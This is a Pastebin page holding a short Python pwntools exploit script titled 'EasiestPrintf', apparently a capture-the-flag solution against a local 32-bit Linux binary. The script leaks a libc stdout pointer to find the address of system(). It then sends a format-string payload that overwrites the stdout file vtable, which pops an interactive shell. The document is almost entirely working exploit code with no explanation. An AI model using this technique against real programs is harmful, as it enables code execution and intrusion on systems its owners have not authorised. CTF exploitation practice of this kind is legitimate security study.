daily pastebin goal
44%
SHARE
TWEET

EasiestPrintf

phieulang1993 Aug 13th, 2017 41 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. from pwn import *
  2. context(arch = 'i386', os = 'linux')
  3.  
  4. libc = ELF('libc.so.6')
  5. BINARY = "EasiestPrintf"
  6. r = process(BINARY)
  7. print "attach %d" % r.pid
  8.  
  9. STDOUT = 0x0804A044
  10.  
  11. def hackIt():
  12.     r.recvuntil("Which address you wanna read:\n")
  13.     r.sendline(str(STDOUT))
  14.     _IO_2_1_stdout_ = int(r.recv(10),16)
  15.     _IO_file_jumps = _IO_2_1_stdout_ + 0x94
  16.     libc_base = _IO_2_1_stdout_ - libc.symbols['_IO_2_1_stdout_']
  17.     system = libc_base + libc.symbols['system']
  18.     log.info('_IO_2_1_stdout_: %#x' % _IO_2_1_stdout_)
  19.     log.info('_IO_file_jumps: %#x' % _IO_file_jumps)
  20.     log.info('libc_base: %#x' % libc_base)
  21.     log.info('system: %#x' % system)
  22.     r.recvuntil("Good Bye\n")
  23.     offset_buf = 7
  24.     new_IO_file_jumps = _IO_2_1_stdout_+0x150
  25.    
  26.     payload = fmtstr_payload(offset_buf, {_IO_file_jumps : new_IO_file_jumps, new_IO_file_jumps+0x1c : system, _IO_2_1_stdout_:u32("sh\x00\x00")}, write_size="short")
  27.     raw_input("debug?")
  28.     r.sendline(payload)
  29.     r.interactive()
  30. hackIt()
RAW Paste Data
Top